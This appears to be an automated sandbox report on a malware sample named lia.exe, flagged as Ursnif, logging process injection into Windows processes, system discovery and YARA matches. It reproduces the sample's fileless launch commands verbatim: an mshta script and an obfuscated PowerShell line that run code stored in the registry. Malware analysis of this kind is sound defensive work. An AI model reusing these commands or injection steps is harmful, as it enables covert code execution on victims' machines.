System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Domain query: io.immontyr.com

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\lia.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\lia.exe	Memory allocated: C:\Windows\System32\control.exe base: 5D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: A90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 215F44A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2DACE190000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26E95750000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3300000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 88E31580	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 88E31580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580

Writes to foreign memory regions

Source: C:\Users\user\Desktop\lia.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6924512E0	Jump to behavior
Source: C:\Users\user\Desktop\lia.exe	Memory written: C:\Windows\System32\control.exe base: 5D0000	Jump to behavior
Source: C:\Users\user\Desktop\lia.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6924512E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 5EA000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 850000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 5E8000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: A90000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FF425FD0	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 215F44A0000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FF425FD0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACF4000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 789A650000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: ECB1F3A000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DACE190000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: D9724C4000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26E95750000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 2B6FC0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 3300000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 2B6FC0

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute read	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 5EA000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 850000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: 40	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3440 base: 5E8000 value: 00	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: EB	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3440 base: A90000 value: 80	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: 40	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\lia.exe	Thread register set: target process: 6004	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 5360	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 3092
Source: C:\Windows\explorer.exe	Thread register set: target process: 4252
Source: C:\Windows\explorer.exe	Thread register set: target process: 4572
Source: C:\Windows\explorer.exe	Thread register set: target process: 5160
Source: C:\Windows\explorer.exe	Thread register set: target process: 5652

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\lia.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP"	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.493442735.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.558340773.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.517558095.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.507991039.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.533591545.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491157547.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.521122130.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.527432058.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.543730981.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.495158244.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\lia.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

1_2_00401AFE

Queries the installation date of Windows

Source: C:\Users\user\Desktop\lia.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_00B142A6 cpuid

1_2_00B142A6

Source: C:\Users\user\Desktop\lia.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_00401C44 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

1_2_00401C44

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_00B142A6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

1_2_00B142A6

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_039EC557 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

1_2_039EC557

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_004017A0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_004017A0

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
